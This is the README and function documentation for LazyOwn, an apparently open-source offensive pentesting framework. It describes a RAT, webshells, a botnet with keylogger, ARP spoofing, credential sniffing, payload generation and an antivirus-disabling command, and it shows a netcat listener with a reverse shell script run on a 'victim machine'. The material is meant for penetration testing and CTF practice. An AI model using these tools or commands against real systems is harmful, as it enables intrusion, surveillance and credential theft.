
LazyOwn Framework [;,;] is a powerful tool written in Python designed to simplify and automate pentesting and vulnerability analysis tasks. This framework offers a wide range of features, from real-time packet capture and analysis to the execution of various pentesting techniques such as fuzzing, deployment of webshells, creation of botnets, implementation of trojans (Rat), keylogging, port scanning with Nmap, and more. The interactive terminal interface provided by LazyOwn makes it easy to configure and execute these functions, providing users with an intuitive and powerful environment for conducting security tests. Additionally, LazyOwn offers the ability to save captured packets to a file for later analysis, facilitating research and incident tracking. Installation of LazyOwn is straightforward, simply by cloning the repository from GitHub and then installing the required dependencies via pip. Once installed, users can start the framework by running the python app.py command from the command line. For any questions or comments, users can contact the developer, Gris Iscomeback, through the channels provided on the official LazyOwn Framework website. In summary, LazyOwn Framework is a comprehensive tool that offers a centralized and automated solution for pentesting and vulnerability analysis needs, enabling cybersecurity professionals to conduct security tests efficiently and effectively.


                ██▓    ▄▄▄      ▒███████▒▓██   ██▓ ▒█████   █     █░███▄    █                
                ▓██▒   ▒████▄    ▒ ▒ ▒ ▄▀░ ▒██  ██▒▒██▒  ██▒▓█░ █ ░█░██ ▀█   █                
                ▒██░   ▒██  ▀█▄  ░ ▒ ▄▀▒░   ▒██ ██░▒██░  ██▒▒█░ █ ░█▓██  ▀█ ██▒               
                ▒██░   ░██▄▄▄▄██   ▄▀▒   ░  ░ ▐██▓░▒██   ██░░█░ █ ░█▓██▒  ▐▌██▒               
                ░██████▒▓█   ▓██▒▒███████▒  ░ ██▒▓░░ ████▓▒░░░██▒██▓▒██░   ▓██░               
                ░ ▒░▓  ░▒▒   ▓▒█░░▒▒ ▓░▒░▒   ██▒▒▒ ░ ▒░▒░▒░ ░ ▓░▒ ▒ ░ ▒░   ▒ ▒                
                ░ ░ ▒  ░ ▒   ▒▒ ░░░▒ ▒ ░ ▒ ▓██ ░▒░   ░ ▒ ▒░   ▒ ░ ░ ░ ░░   ░ ▒░               
                  ░ ░    ░   ▒   ░ ░ ░ ░ ░ ▒ ▒ ░░  ░ ░ ░ ▒    ░   ░    ░   ░ ░                
                    ░  ░     ░  ░  ░ ░     ░ ░         ░ ░      ░            ░                
                                 ░         ░ ░                                                
                  █████▒██▀███   ▄▄▄       ███▄ ▄███▓▓█████  █     █░ ▒█████   ██▀███   ██ ▄█▀
                ▓██   ▒▓██ ▒ ██▒▒████▄    ▓██▒▀█▀ ██▒▓█   ▀ ▓█░ █ ░█░▒██▒  ██▒▓██ ▒ ██▒ ██▄█▒ 
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                 ▒ ░   ░ ▒▓ ░▒▓░ ▒▒   ▓▒█░░ ▒░   ░  ░░░ ▒░ ░░ ▓░▒ ▒  ░ ▒░▒░▒░ ░ ▒▓ ░▒▓░▒ ▒▒ ▓▒
                 ░       ░▒ ░ ▒░  ▒   ▒▒ ░░  ░      ░ ░ ░  ░  ▒ ░ ░    ░ ▒ ▒░   ░▒ ░ ▒░░ ░▒ ▒░
                 ░ ░     ░░   ░   ░   ▒   ░      ░      ░     ░   ░  ░ ░ ░ ▒    ░░   ░ ░ ░░ ░ 
                          ░           ░  ░       ░      ░  ░    ░        ░ ░     ░     ░  ░   
  [⚠] Starting 👽 LazyOwn Framew0rk ☠ [;,;] Autor: grisUN0
  [*] Welcome to the LazyOwn Framework [;,;] release/0.1.22 
  [*] interactive sHell! Type ? to list commands
  [!] Please do not use in military or secret service organizations, 
  [!] or for illegal purposes (this is non-binding, 
  [!] these *** ignore laws and ethics anyway)
  [+] Github: https://github.com/grisuno/LazyOwn
  [+] Web: https://grisuno.github.io/LazyOwn/
  [+] Reddit: https://www.reddit.com/r/LazyOwn/
  [+] Facebook: https://web.facebook.com/profile.php?id=61560596232150
  [+] hackTheBox: https://app.hackthebox.com/teams/overview/6429 
  [+] Patreon: https://patreon.com/LazyOwn 




To get started with LazyOwn Framework, clone the repository and install the dependencies:

git clone https://github.com/grisuno/LazyOwn.git
cd LazyOwn
pip install -r requirements.txt


Run the Framework with the following command:

python app.py 

Para codificar y decodificar payloads con esta app web, sí se te dificulta el uso de test_lazyencode_decode.py



For any questions or feedback, please reach out to Gris Iscomeback.

README LazyOwn Framework Pentesting t00lz

README LazyOwn Framework Pentesting t00lz


Python Shell Script image image License: GPL v3 image image

██╗      █████╗ ███████╗██╗   ██╗ ██████╗ ██╗    ██╗███╗   ██╗
██║     ██╔══██╗╚══███╔╝╚██╗ ██╔╝██╔═══██╗██║    ██║████╗  ██║
██║     ███████║  ███╔╝  ╚████╔╝ ██║   ██║██║ █╗ ██║██╔██╗ ██║
██║     ██╔══██║ ███╔╝    ╚██╔╝  ██║   ██║██║███╗██║██║╚██╗██║
███████╗██║  ██║███████╗   ██║   ╚██████╔╝╚███╔███╔╝██║ ╚████║
╚══════╝╚═╝  ╚═╝╚══════╝   ╚═╝    ╚═════╝  ╚══╝╚══╝ ╚═╝  ╚═══╝



LazyOwn comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under the terms of the GNU General Public License v3. See the LICENSE file for details about using this software.

LazyOwn Framework is a powerful and versatile security framework designed to automate and streamline pentesting and vulnerability analysis tasks. This interactive environment combines multiple tools and scripts, making it easier for cybersecurity professionals to work through various stages of the security assessment lifecycle. With an intuitive command-line interface, LazyOwn allows users to configure specific parameters, execute custom scripts, and obtain real-time results, all from a single platform.

Key Features:

Interactive Interface:

Interactive shell with user-friendly commands for configuring and running scripts. Ability to display and adjust custom parameters applicable to different scripts. Task Automation:

Automates common pentesting tasks such as vulnerability scanning, web application fuzzing, brute force attacks, and more. Integration with popular tools and custom scripts for comprehensive testing coverage on Parrot Sec. Real-Time Visualization:

Real-time output display of script execution, allowing users to see results instantly and react swiftly. Modularity and Extensibility:

Designed to be extensible, enabling users to easily add and customize scripts. Supports multiple scripting languages, including Python and Bash. Flexible Configuration:

Ability to set specific parameters like IP addresses, API keys, HTTP methods, request data, and more, providing complete control over executed scripts. Typical Use:

Parameter Configuration:

Users can set required parameters using commands like set target_ip to define the target IP address. Script Execution:

Execute predefined scripts for various tasks, such as run lazygptcli to interact with GPT using a configured prompt and API key. Results Visualization:

Script results are displayed in the console in real-time, providing immediate feedback on progress and findings. Additional Modules:

LazyOwn includes various specialized modules such as:

lazyownrat and lazyownratcli: For running remote access tools with configurable parameters. lazyftpsniff and lazysniff: For network sniffing on specified interfaces. lazysearch_bot and lazygptcli: For interacting with search APIs and GPT-based tools. lazyhoneypot: For setting up email-based honeypots. lazynetbios: For NetBIOS enumeration across IP ranges. lazywerkzeugdebug: For testing Werkzeug in debug mode. Background:

Originally designed to automate the search and analysis of binaries with special permissions on Linux and Windows systems, LazyOwn has evolved to encompass a broader range of functionalities. The project includes scripts that extract information from GTFOBins, analyze binaries on the system, and generate options based on the collected data.

LazyOwn on Reddit

Revolutionize Your Pentesting with LazyOwn: Automate the intrusion on Linux, MAC OSX, and Windows VICTIMS



Discover LazyOwn, the ultimate solution for automating the pentesting workflow to attack Linux, MacOSX and Windows systems. Our powerful tool simplifies pentesting, making it more efficient and effective. Watch this video to learn how LazyOwn can streamline your security assessments and enhance your cybersecurity toolkit.

LazyOwn> set rhost
[SET] rhost set to
LazyOwn> run lazynmap
[INFO] Running Nmap scan on

LazyOwn is ideal for cybersecurity professionals seeking a centralized and automated solution for their pentesting needs, saving time and enhancing efficiency in identifying and exploiting vulnerabilities.

Captura de pantalla 2024-05-22 021136



  1. Clona el repositorio:
git clone https://github.com/grisuno/LazyOwn.git
cd LazyOwn
  1. Instala las dependencias de Python:


./run or ./fast_run_as_r00t.sh 

./run --help
    [;,;] LazyOwn release/0.1.20
    Uso: ./run [opciones]
      --help         Muestra esta ayuda
      -v             Muestra la version
      -c             Ejecuta un comando del LazyOwn ej: ping
      --no-banner    No muestra el Banner
      -s             Run as r00t 

./fast_run_as_r00t.sh --vpn 1 (the number id of your file in vpn directory)
Use set <parameter> <value> to configure parameters.
Use show to display the current parameter values.
Use run <script_name> to execute a script with the set parameters.
Use exit to exit the CLI.

Once the shell is running, you can use the following commands:

list: Lists all LazyOwn Modules.
set <parameter> <value>: Sets the value of a parameter. For example, set rhost
show: Displays the current values of all parameters.
run <script>: Executes a specific script available in the framework.
Available Scripts

┌─[LazyOwn👽 ~/home/gris/tools/LazyOwn][][http://lantern.htb/]
└╼ $ ls
    [+] Available scripts to run: [👽]
    [+] lazysearch                lazysearch_gui            lazyown                 [👽]
    [+] update_db                 lazynmap                  lazyaslrcheck           [👽]
    [+] lazynmapdiscovery         lazygptcli                lazyburpfuzzer          [👽]
    [+] lazymetaextract0r         lazyreverse_shell         lazyattack              [👽]
    [+] lazyownratcli             lazyownrat                lazygath                [👽]
    [+] lazysniff                 lazynetbios               lazybotnet              [👽]
    [+] lazybotcli                lazyhoneypot              lazysearch_bot          [👽]
    [+] lazylfi2rce               lazylogpoisoning          lazymsfvenom            [👽]
    [+] lazypathhijacking         lazyarpspoofing           lazyftpsniff            [👽]
    [+] lazyssh77enum             lazywerkzeugdebug       [👽]
┌─[LazyOwn👽 ~/home/gris/tools/LazyOwn][][http://lantern.htb/]
└╼ $ 
┌─[LazyOwn👽 ~/home/gris/tools/LazyOwn][][http://lantern.htb/]
└╼ $ ?

Documented commands (type help <topic>):
EOF                dnsmap              ldapdomaindump       searchhash      
acknowledgearp     download_exploit    list                 seo             
acknowledgeicmp    download_resources  lynis                sessionssh      
addhosts           encode              medusa               sessionsshstrace
alias              encoderpayload      msf                  set             
apropos            encrypt             nbtscan              set_proxychains 
arpscan            enum4linux          nikto                sh              
asprevbase64       exit                nmapscript           shellcode       
banner             finalrecon          nmapscripthelp       show            
base64decode       find                openssl_sclient      skipfish        
base64encode       fixel               payload              smbclient       
bloodhound         fixperm             ping                 smbmap          
chisel             ftp                 portdiscover         smbserver       
clean              getcap              ports                smtpuserenum    
clock              getnpusers          portservicediscover  snmpcheck       
cme                getseclist          proxy                socat           
conptyshell        gobuster            psexec               sqlmap          
cp                 gospider            pwd                  ss              
cports             grisun0             pwncatcs             ssh             
createcookie       hashcat             py3ttyup             sshd            
createcredentials  help                pyautomate           swaks           
createdll          hostdiscover        qa                   tcpdump_capture 
createhash         hydra               rdp                  tcpdump_icmp    
createrevshell     id_rsa              responder            tshark_analyze  
createwebshell     ignorearp           rev                  urldecode       
createwinrevshell  ignoreicmp          revwin               urlencode       
creds              img2cookie          rhost                vpn             
decode             ip                  rot                  wfuzz           
decrypt            john2hash           rpcclient            whatweb         
dig                launchpad           rpcdump              winbase64payload
dirsearch          lazypwn             rubeus               wrapper         
disableav          lazyscript          run                  www             
dnsenum            lazywebshell        samrdump           

┌─[LazyOwn👽 ~/home/gris/tools/LazyOwn][][http://lantern.htb/]
└╼ $ 

Tag in youtube


LazyOwn> set binary_name my_binary
LazyOwn> set rhost
LazyOwn> set api_key my_api_key
LazyOwn> run lazysearch
LazyOwn> run lazynmap
LazyOwn> exit

For searching within the scraped database obtained from GTFOBins.

python3 lazysearch.py binario_a_buscar

Searches with GUI

Additional Features and Enhancements: AutocompleteEntry:

A filter has been added to remove None values from the autocomplete list. New Attack Vector:

A “New Attack Vector” button has been added to the main interface. Functionality has been implemented to add a new attack vector and save the updated data in Parquet files. Export to CSV:

A “Export to CSV” button has been added to the main interface. Functionality has been implemented to export DataFrame data to a user-selected CSV file. Usage:

Add a New Attack Vector: Click the “New Attack Vector” button, fill in the fields, and save. Export to CSV: Click the “Export to CSV” button and select the location to save the CSV file. New Function scan_system_for_binaries:

Implements system-wide binary searches using the file command to determine if a file is binary. Uses os.walk to traverse the file system. Results are displayed in a new window within the GUI. Button to Search for Binaries:

A “Search System for Binaries” button has been added to the main interface, which calls the scan_system_for_binaries function. Note:

The is_binary function uses the Unix file command to determine if a file is a binary executable. If you are on a different operating system, you will need to adjust this method for compatibility. This implementation can be resource-intensive as it traverses the entire file system. You may consider adding additional options to limit the search to specific directories or filter for certain file types.

python3 LazyOwnExplorer.py
python3 lazyown.py

If you want to update, we proceed as follows:

cd LazyOwn
rm *.csv
rm *.parquet

Use mode LazyOwn WebShells

LazyOwn Webshell Collection is a collection of webshells for our framework, which allows us to establish a webshell on the machine where we run LazyOwn using various programming languages. Essentially, LazyOwn Webshell raises a web server within the modules directory, making it accessible via a web browser. This allows us to both make the modules available separately through the web and access the cgi-bin directory, where there are four shells: one in Bash, another in Perl, another in Python, and one in ASP, in case the target is a Windows machine.


y listo ya podemos acceder a cualquiera de estas url:






Use Lazy MSFVenom to Reverse Shell

Executes the `msfvenom` tool to generate a variety of payloads based on user input.

This function prompts the user to select a payload type from a predefined list and runs the corresponding
`msfvenom` command to create the desired payload. It handles tasks such as generating different types of
payloads for Linux, Windows, macOS, and Android systems, including optional encoding with Shikata Ga Nai for C payloads.

The generated payloads are moved to a `sessions` directory, where appropriate permissions are set. Additionally,
the payloads can be compressed using UPX for space efficiency. If the selected payload is an Android APK,
the function will also sign the APK and perform necessary post-processing steps.

:param line: Command line arguments for the script.
:return: None
run lazymsfvenom or venom

Use Lazy PATH Hijacking

A file will be created in /tmp with the name binary_name set in the payload, initialized with gzip in memory, and using bash in the payload. To set the payload from the JSON, use the payload command to execute. Use:


Use mode LazyOwn RAT

LazyOwn RAT is a simple yet powerful Remote Administration Tool. It features a screenshot function that captures the server’s screen, an upload command that allows us to upload files to the compromised machine, and a C&C mode where commands can be sent to the server. It operates in two modes: client mode and server mode. There is no obfuscation, and the RAT is based on BasicRat. You can find it on GitHub at https://github.com/awesome-security/basicRAT and at https://github.com/hash3liZer/SillyRAT. Although the latter is much more comprehensive, I just wanted to implement screenshot capture, file uploads, and command sending. Perhaps in the future, I will add webcam viewing functionality, but that will come later.

usage: lazyownserver.py [-h] [--host HOST] [--port PORT] --key KEY
lazyownserver.py: error: the following arguments are required: --key

usage: lazyownclient.py [-h] --host HOST --port PORT --key KEY
lazyownclient.py: error: the following arguments are required: --host, --port, --key

LazyOwn> run lazyownclient
[?] lhost and lport and rat_key must be set

LazyOwn> run lazyownserver
[?] rhost and lport and rat_key must be set

luego los comandos son:

upload /path/to/file
donwload /path/to/file
fix_xauth #to fix xauth xD
lazyownreverse 8888 #Reverse shell to on port 8888 ready to C&C

Use mode Lazy Meta Extract0r

LazyMeta Extract0r is a tool designed to extract metadata from various types of files, including PDF, DOCX, OLE files (such as DOC and XLS), and several image formats (JPG, JPEG, TIFF). This tool will traverse a specified directory, search for files with compatible extensions, extract the metadata, and save it to an output file.

[*] Iniciando: LazyMeta extract0r [;,;]

usage: lazyown_metaextract0r.py [-h] –path PATH lazyown_metaextract0r.py: error: the following arguments are required: –path

python3 lazyown_metaextract0r.py --path /home/user

Use mode decrypt encrypt

A encryption method that allows us to both encrypt files and decrypt them if we have the key, of course.

Captura de pantalla 2024-06-08 231900
encrypt path/to/file key # to encrypt
decrypt path/to/file.enc key #to decrypt

Uso modo LazyNmap

The use of Lazynmap provides us with an automated script for a target, in this case,, using Nmap. The script requires administrative permissions via sudo. It also includes a network discovery module to identify what is present in the IP segment you are in. Additionally, the script can now be called without parameters using the alias nmap or with the command run lazynmap.

./lazynmap.sh -t 

Usage of LazyOwn GPT One Liner CLI Assistant and Researcher

Discover the revolution in automating pentesting tasks with the LazyOwn GPT One Liner CLI Assistant! This incredible script is part of the LazyOwn tool suite, designed to make your life as a pentester more efficient and productive.

🚀 Key Features:

Intelligent Automation: Leverages the power of Groq and advanced natural language models to generate precise and efficient commands based on your specific needs. User-Friendly Interface: With a simple prompt, the assistant generates and executes one-liner scripts, drastically reducing the time and effort involved in creating complex commands. Continuous Improvement: Continuously transforms and optimizes its knowledge base to provide you with the best solutions, adapting to each situation. Simplified Debugging: Enable debug mode to obtain detailed information at every step, facilitating the identification and correction of errors. Seamless Integration: Works effortlessly within your workspace, harnessing the power of the Groq API to deliver quick and accurate responses. 🔒 Security and Control:

Safe Error Handling: Intelligently detects and responds to execution errors, ensuring you maintain full control over each generated command. Controlled Execution: Before executing any command, it requests your confirmation, giving you peace of mind knowing exactly what is being executed on your system. 🌐 Easy Configuration:

Set up your API key in seconds and start enjoying all the benefits offered by the LazyOwn GPT One Liner CLI Assistant. A quick start guide is available to help you configure and maximize the potential of this powerful tool.

🎯 Ideal for Pentesters and Developers:

Optimize Your Processes: Simplify and accelerate command generation in your security audits. Continuous Learning: The knowledge base is constantly updated and improved, always providing you with the latest best practices and solutions. With the LazyOwn GPT One Liner CLI Assistant, transform the way you work, making it faster, more efficient, and secure. Stop wasting time on repetitive and complex tasks, and focus on what truly matters: discovering and resolving vulnerabilities!

Join the pentesting revolution with LazyOwn and take your productivity to the next level!

[?] Usage: python lazygptcli.py –prompt “” [–debug]

[?] Options:

–prompt “The prompt for the programming task (required).” –debug, -d “Enables debug mode to display debug messages.” –transform “Transforms the original knowledge base into an enhanced base using Groq.” [?] Ensure you configure your API key before running the script: export GROQ_API_KEY= [->] Visit: https://console.groq.com/docs/quickstart (not a sponsored link)


Python 3.x A valid Groq API key Steps to Obtain the Groq API Key: Visit Groq Console (https://console.groq.com/docs/quickstart) to register and obtain an API key.

export GROQ_API_KEY=<tu_api_key>
python3 lazygptcli.py --prompt "<tu prompt>" [--debug]          

Usage of lazyown_bprfuzzer.py

Provide the arguments as specified by the script’s requests: The script will require the following arguments:

usage: lazyown_bprfuzzer.py [-h] –url URL [–method METHOD] [–headers HEADERS] [–params PARAMS] [–data DATA] [–json_data JSON_DATA] [–proxy_port PROXY_PORT] [-w WORDLIST] [-hc HIDE_CODE] –url: The URL to which the request will be sent (required). –method: The HTTP method to use, such as GET or POST (optional, default: GET). –headers: The request headers in JSON format (optional, default: {}). –params: The URL parameters in JSON format (optional, default: {}). –data: The form data in JSON format (optional, default: {}). –json_data: The JSON data for the request in JSON format (optional, default: {}). –proxy_port: The port for the internal proxy (optional, default: 8080). -w, –wordlist: The path to the wordlist for fuzzing mode (optional). -hc, –hide_code: The HTTP status code to hide in the output (optional). Make sure to provide the required arguments to ensure the script runs correctly.

python3 lazyown_bprfuzzer.py --url "http://example.com" --method POST --headers '{"Content-Type": "LAZYFUZZ"}'

Form 2: Advanced Usage

If you wish to take advantage of the advanced features of the script, such as request replay or fuzzing, follow these steps:

Request Replay:

To utilize the request replay functionality, provide the arguments as indicated earlier. During execution, the script will ask if you want to repeat the request. Enter ‘y’ to repeat or ‘n’ to terminate the repeater. Fuzzing:

To use the fuzzing functionality, make sure to provide a wordlist with the -w or –wordlist argument. The script will replace the word LAZYFUZZ in the URL and other data with the words from the provided wordlist. During execution, the script will display the results of each fuzzing iteration. These are the basic and advanced ways to use the lazyburp.py script. Depending on your needs, you can choose the method that best fits your specific situation.

python3 lazyown_bprfuzzer.py \                                                                                                           ─╯
    --url "" \
    --method POST \
    --headers '{"User-Agent": "LAZYFUZZ"}' \
    --params '{"param1": "value1", "param2": "LAZYFUZZ"}' \
    --data '{"key1": "LAZYFUZZ", "key2": "value2"}' \
    --json_data '{"key3": "LAZYFUZZ"}' \
    --proxy_port 8080 \
    -w /usr/share/seclist/SecLists-master/Discovery/Variables/awesome-environment-variable-names.txt \
    -hc 501
python3 lazyown_bprfuzzer.py \                                                                                                           ─╯
    --url "" \
    --method POST \
    --headers '{"User-Agent": "LAZYFUZZ"}' \
    --params '{"param1": "value1", "param2": "LAZYFUZZ"}' \
    --data '{"key1": "LAZYFUZZ", "key2": "value2"}' \
    --json_data '{"key3": "LAZYFUZZ"}' \
    --proxy_port 8080 \
    -w /usr/share/seclist/SecLists-master/Discovery/Variables/awesome-environment-variable-names.txt \

image Note: To use the dictionary, run the following command within /usr/share/seclists:

now the command 'getseclist' do that automated.
wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip \
&& unzip SecList.zip \
&& rm -f SecList.zip

Usage of LazyOwn FTP Sniff Mode

This module is used to search for passwords on FTP servers across the network. Some may say that FTP is no longer used, but you would be surprised at the critical infrastructure environments I’ve seen with massive FTP services running on their servers. :)

set device eth0
run lazyftpsniff

Uso modo LazyReverseShell


nc -nlvp 1337 #o el puerto que escojamos 

para luego en la maquina victima

./lazyreverse_shell.sh --ip --puerto 1337

Usage of Lazy Curl to Recon Mode

The module is located in the modules directory and is used as follows:

chmod +x lazycurl.sh

and then

./lazycurl.sh --mode GET --url



./lazycurl.sh --mode GET --url


./lazycurl.sh --mode POST --url --data "param1=value1&param2=value2"


./lazycurl.sh --mode TRACE --url

File upload:

./lazycurl.sh --mode UPLOAD --url --file file.txt

wordlist bruteforce mode:

./lazycurl.sh --mode BRUTE_FORCE --url --wordlist /usr/share/wordlists/rockyou.txt

Make sure to adjust the parameters according to your needs and that the values you provide for the options are valid for each case.

Usage of ARPSpoofing Mode

The script provides an ARP spoofing attack using Scapy. In the payload, you must set the lhost, rhost, and the device that you will use to perform the ARP spoofing.

set rhost
set lhost
set device eth0
run lazyarpspoofing

Usage of LazyGathering Mode

This script provides an X-ray view of the system in question where the tool is being executed, offering insights into its configuration and state.

run lazygath

Usage of Lazy Own LFI RFI 2 RCE Mode

The LFI RFI 2 RCE mode is designed to test some of the more well-known payloads against the parameters specified in payload.json. This allows for a comprehensive assessment of Local File Inclusion (LFI), Remote File Inclusion (RFI), and Remote Code Execution (RCE) vulnerabilities in the target system.

run lazylfi2rce

Usage of LazyOwn Sniffer Mode


The sniffer mode allows capturing network traffic through interfaces using the -i option, which is mandatory. There are many other optional settings that can be adjusted as needed.


usage: lazysniff.py [-h] -i INTERFACE [-c COUNT] [-f FILTER] [-p PCAP]
lazysniff.py: error: the following arguments are required: -i/--interface

![Captura de pantalla 2024-06-05 031231](https://github.com/grisuno/LazyOwn/assets/1097185/db1e05a0-026e-414f-9ec6-0a9ef2cb06fe)

To use the sniffer from the framework, you must configure the device with the command:

run lazysniff
or just

Experimental Obfuscation Using PyInstaller

This feature is in experimental mode and does not work fully due to a path issue. Soon, it will support obfuscation using PyInstaller.


Experimental NetBIOS Exploit

This feature is in experimental mode as it is not functioning yet… (coming soon, possibly an implementation of EternalBlue among other things…)

run lazynetbios

Experimental LazyBotNet with Keylogger for Windows and Linux

This feature is in experimental mode, and the decryption of the keylogger logs is not functioning xD. Here we see for the first time in action the payload command, which sets all the configuration in our payload.json, allowing us to preload the configuration before starting the framework.

run lazybotnet

Interactive Menus

The script features interactive menus to select actions to be performed. In server mode, it displays relevant options for the victim machine, while in client mode, it shows options relevant to the attacking machine.

Clean Interruption

The script handles the SIGINT signal (usually generated by Control + C) to exit cleanly.


This project is licensed under the GPL v3 License. The information contained in GTFOBins is owned by its authors, to whom we are immensely grateful for the information provided.

Acknowledgments ✌

A special thanks to GTFOBins for the valuable information they provide and to you for using this project. Also, thanks for your support Tito S4vitar! who does an extraordinary job of outreach. Of course, I use the extractPorts function in my .zshrc :D

Thanks to pwntomate 🍅

An excellent tool that I adapted a bit to work with the project; all credits go to its author honze-net Andreas Hontzia. Visit and show love to the project: https://github.com/honze-net/pwntomate

Thanks to Sicat 🐈

An excellent tool for CVE detection, I implemented only the keyword search as I had to change some libraries. Soon also for XML generated by nmap :) Total thanks to justakazh. https://github.com/justakazh/sicat/


LazyOwn is a framework that streamlines its workflow and automates many tasks and tests through aliases and various tools, functioning like a Swiss army knife with multipurpose blades for hacking xD.

Documentation by readmeneitor.py

Documentation automatically created by the script readmeneitor.py created for this project; maybe one day it will have its own repo, but for now, I don’t see it as necessary.

UTILS.md Documentation by readmeneitor.py


Extracts IP and MAC addresses from a formatted input string using a regular expression.

The input string is expected to be in the format: ‘IP: ( MAC: ec:c3:02:b0:4c:96’. The function uses a regular expression to match and extract the IP address and MAC address from the input.

Args: input_string (str): The formatted string containing the IP and MAC addresses.

Returns: tuple: A tuple containing the extracted IP address and MAC address. If the format is incorrect, returns (None, None).


Constructs an ARP packet with the given source and destination IP and MAC addresses.

The function creates both Ethernet and ARP headers, combining them into a complete ARP packet.

Args: src_mac (str): Source MAC address in the format ‘xx:xx:xx:xx:xx:xx’. src_ip (str): Source IP address in dotted decimal format (e.g., ‘’). dst_ip (str): Destination IP address in dotted decimal format (e.g., ‘’). dst_mac (str): Destination MAC address in the format ‘xx:xx:xx:xx:xx:xx’.

Returns: bytes: The constructed ARP packet containing the Ethernet and ARP headers.


Sends a raw ARP packet over the specified network interface.

The function creates a raw socket, binds it to the specified network interface, and sends the given packet.

Args: packet (bytes): The ARP packet to be sent. iface (str): The name of the network interface to use for sending the packet (e.g., ‘eth0’).

Raises: OSError: If an error occurs while creating the socket or sending the packet.


Load the version number from the ‘version.json’ file.

This function attempts to open the ‘version.json’ file and load its contents. If the file is found, it retrieves the version number from the JSON data. If the version key does not exist, it returns a default version ‘release/v0.0.14’. If the file is not found, it also returns the default version.

Returns: - str: The version number from the file or the default version if the file is not found or the version key is missing.

Prints an error message to the console.

This function takes an error message as input and prints it to the console with a specific format to indicate that it is an error.

:param error: The error message to be printed. :type error: str :return: None

Prints a message to the console.

This function takes a message as input and prints it to the console with a specific format to indicate that it is an informational message.

:param msg: The message to be printed. :type msg: str :return: None

Prints a warning message to the console.

This function takes a warning message as input and prints it to the console with a specific format to indicate that it is a warning.

:param warn: The warning message to be printed. :type warn: str :return: None


Handles signals such as Control + C and shows a message on how to exit.

This function is used to handle signals like Control + C (SIGINT) and prints a warning message instructing the user on how to exit the program using the commands ‘exit’, ‘q’, or ‘qa’.

:param sig: The signal number. :type sig: int :param frame: The current stack frame. :type frame: frame :return: None


Checks if the remote host (rhost) is defined and shows an error message if it is not.

This function verifies if the rhost parameter is set. If it is not defined, an error message is printed, providing an example and directing the user to additional help.

:param rhost: The remote host to be checked. :type rhost: str :return: True if rhost is defined, False otherwise. :rtype: bool


Checks if the local host (lhost) is defined and shows an error message if it is not.

This function verifies if the lhost parameter is set. If it is not defined, an error message is printed, providing an example and directing the user to additional help.

:param lhost: The local host to be checked. :type lhost: str :return: True if lhost is defined, False otherwise. :rtype: bool


Checks if the local port (lport) is defined and shows an error message if it is not.

This function verifies if the lport parameter is set. If it is not defined, an error message is printed, providing an example and directing the user to additional help.

:param lport: The local port to be checked. :type lport: int or str :return: True if lport is defined, False otherwise. :rtype: bool


Internal function to verify if a binary is present on the operating system.

This function checks if a specified binary is available in the system’s PATH by using the which command. It returns True if the binary is found and False otherwise.

:param binary_name: The name of the binary to be checked. :type binary_name: str :return: True if the binary is present, False otherwise. :rtype: bool


Internal function to handle multiple remote hosts (rhost) for operations.

This function is a decorator that allows an operation to be performed across multiple remote hosts specified in self.params["rhost"]. It converts a single remote host into a list if necessary, and then iterates over each host, performing the given function with each host. After the operation, it restores the original remote host value.

:param func: The function to be decorated and executed for each remote host. :type func: function :return: The decorated function. :rtype: function


Checks if the script is running with superuser (sudo) privileges, and if not, restarts the script with sudo privileges.

This function verifies if the script is being executed with root privileges by checking the effective user ID. If the script is not running as root, it prints a warning message and restarts the script using sudo.

:return: None


Activates a virtual environment and starts an interactive shell.

This function activates a virtual environment located at venv_path and then launches an interactive bash shell with the virtual environment activated.

:param venv_path: The path to the virtual environment directory. :type venv_path: str :return: None


Internal function to parse a /proc/net file and extract network ports.

This function reads a file specified by file_path, processes each line to extract local addresses and ports, and converts them from hexadecimal to decimal. The IP addresses are converted from hexadecimal format to standard dot-decimal notation. The function returns a list of tuples, each containing an IP address and a port number.

:param file_path: The path to the /proc/net file to be parsed. :type file_path: str :return: A list of tuples, each containing an IP address and a port number. :rtype: list of tuple


Internal function to get open TCP and UDP ports on the operating system.

This function uses the parse_proc_net_file function to extract open TCP and UDP ports from the corresponding /proc/net files. It returns two lists: one for TCP ports and one for UDP ports.

:return: A tuple containing two lists: the first list with open TCP ports and the second list with open UDP ports. :rtype: tuple of (list of tuple, list of tuple)


Searches for potential credentials in files within the specified directory.

This function uses a regular expression to find possible credentials such as passwords, secrets, API keys, and tokens in files within the given directory. It iterates through all files in the directory and prints any matches found.

:param directory: The directory to search for files containing credentials. :type directory: str :return: None


Internal function to rotate characters for ROT cipher.

This function takes a character and a shift value, and rotates the character by the specified shift amount. It only affects alphabetical characters, leaving non-alphabetical characters unchanged.

:param c: The character to be rotated. :type c: str :param shift: The number of positions to shift the character. :type shift: int :return: The rotated character. :rtype: str


Retrieves network interface information with their associated IP addresses.

This function executes a shell command to gather network interface details, parses the output to extract interface names and their corresponding IP addresses, and returns this information in a dictionary format. The dictionary keys are interface names, and the values are IP addresses.

:return: A dictionary where the keys are network interface names and the values are their associated IP addresses. :rtype: dict


Generate a command prompt string with network information and user status.

:param: None

:returns: A string representing the command prompt with network information and user status.

Manual execution: To manually get a prompt string with network information and user status, ensure you have get_network_info() implemented to return a dictionary of network interfaces and their IPs. Then use the function to create a prompt string based on the current user and network info.

Example: If the function get_network_info() returns: { ‘tun0’: ‘’, ‘eth0’: ‘’ }

And the user is root, the prompt string generated might be: [LazyOwn👽]# If the user is not root, it would be: [LazyOwn👽]$

If no ‘tun’ interface is found, the function will use the first available IP or fallback to ‘’.


Copia el texto proporcionado al portapapeles usando xclip.

Args: text (str): El texto que se desea copiar al portapapeles.

Example: copy2clip(“Hello, World!”)


Elimina secuencias de escape de color y otros caracteres no imprimibles.


Procesa un archivo para extraer y mostrar caracteres desde secuencias de escritura específicas.

Args: filename (str): El nombre del archivo a leer.

Raises: FileNotFoundError: Si el archivo no se encuentra. Exception: Para otros errores que puedan ocurrir.


Lee un archivo, extrae texto desde secuencias de escritura y muestra el contenido reconstruido.

Args: filename (str): El nombre del archivo a leer.

Raises: FileNotFoundError: Si el archivo no se encuentra. Exception: Para otros errores que puedan ocurrir.


Process and display results from ExploitAlert.

This function checks if the provided content contains any results. If results are present, it prints the title and link for each exploit found, and appends the results to a predata list. If no results are found, it prints an error message.

Parameters: - content (list): A list of dictionaries containing exploit information.

Returns: None Thanks to Sicat 🐈 An excellent tool for CVE detection, I implemented only the keyword search as I had to change some libraries. Soon also for XML generated by nmap :) Total thanks to justakazh. https://github.com/justakazh/sicat/


